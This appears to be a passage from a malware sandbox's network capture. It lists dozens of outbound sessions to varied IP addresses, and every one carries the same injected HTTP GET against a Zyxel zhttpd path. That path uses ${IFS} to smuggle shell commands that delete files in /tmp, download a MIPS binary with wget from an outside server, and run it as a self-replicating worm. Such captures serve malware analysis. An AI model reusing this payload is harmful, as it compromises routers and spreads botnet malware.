                                            Jan 14, 2024 15:50:32.294190884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2379192.168.2.2359226128.74.238.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294239998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2380192.168.2.2340786140.73.204.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294258118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2381192.168.2.2350630167.18.118.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294301033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2382192.168.2.234601683.168.209.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294320107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2383192.168.2.2339476151.3.204.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294374943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2384192.168.2.2341080204.120.31.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294394016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2385192.168.2.234466892.20.75.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294435024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2386192.168.2.2359852167.77.133.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294462919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2387192.168.2.235607648.91.47.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294498920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2388192.168.2.235136448.31.126.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294507027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2389192.168.2.233714866.43.0.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294526100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2390192.168.2.234433689.71.32.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294554949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2391192.168.2.234444861.26.245.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294588089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2392192.168.2.235715458.162.231.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294648886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2393192.168.2.2336412140.201.44.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294672966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2394192.168.2.2334928223.31.174.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294686079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2395192.168.2.235133832.32.89.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294718027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2396192.168.2.2344832169.120.101.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294749022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2397192.168.2.2349552196.123.185.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294800043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2398192.168.2.2358146223.155.35.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294841051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2399192.168.2.235238084.213.247.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294841051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2400192.168.2.235833025.211.17.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294846058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2401192.168.2.23567384.163.78.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294899940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2402192.168.2.2358858219.18.194.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294941902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2403192.168.2.2337542186.80.215.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294986010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2404192.168.2.2337870183.136.242.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.295007944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2405192.168.2.2339396128.77.104.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.295047998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2406192.168.2.2339084167.192.84.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.295061111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2407192.168.2.2341906138.120.155.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.295084953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2408192.168.2.2344476205.9.168.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.295116901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2409192.168.2.233652034.252.233.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.295156956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2410192.168.2.2356280111.157.46.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.295183897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2411192.168.2.2337982140.153.79.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.297842979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2412192.168.2.2345088159.16.157.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298366070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2413192.168.2.234406059.205.60.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298386097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2414192.168.2.2336120204.16.205.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298398972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2415192.168.2.2360152113.136.174.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298472881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2416192.168.2.2358720155.134.1.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298512936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2417192.168.2.2358390199.22.62.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298535109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2418192.168.2.2338166132.27.236.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298557043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2419192.168.2.236011082.119.7.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298569918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2420192.168.2.2354980121.71.95.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298572063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2421192.168.2.2356582105.202.18.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298631907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2422192.168.2.2335292217.185.36.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298645973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2423192.168.2.235846252.239.165.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298672915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2424192.168.2.2339806112.156.187.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298695087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2425192.168.2.2336616188.79.83.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298757076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2426192.168.2.2352802204.226.206.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298777103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2427192.168.2.2351714106.54.45.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298810005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2428192.168.2.235417273.33.94.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298851967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2429192.168.2.235427493.250.27.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298882008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2430192.168.2.23534761.177.21.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298913956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2431192.168.2.2338386132.222.40.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298943043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2432192.168.2.2356238117.47.217.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.298973083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2433192.168.2.234394261.170.10.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.299007893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2434192.168.2.234859088.217.18.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.299030066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2435192.168.2.234858840.17.18.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.299053907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2436192.168.2.2336624108.233.112.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305505991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2437192.168.2.2333554122.5.50.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305526018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2438192.168.2.2353274106.150.48.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305560112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2439192.168.2.234148019.106.130.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305608034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2440192.168.2.2353250137.55.67.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305648088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2441192.168.2.2334196193.230.199.235443
                                            TimestampBytes transferredDirectionData
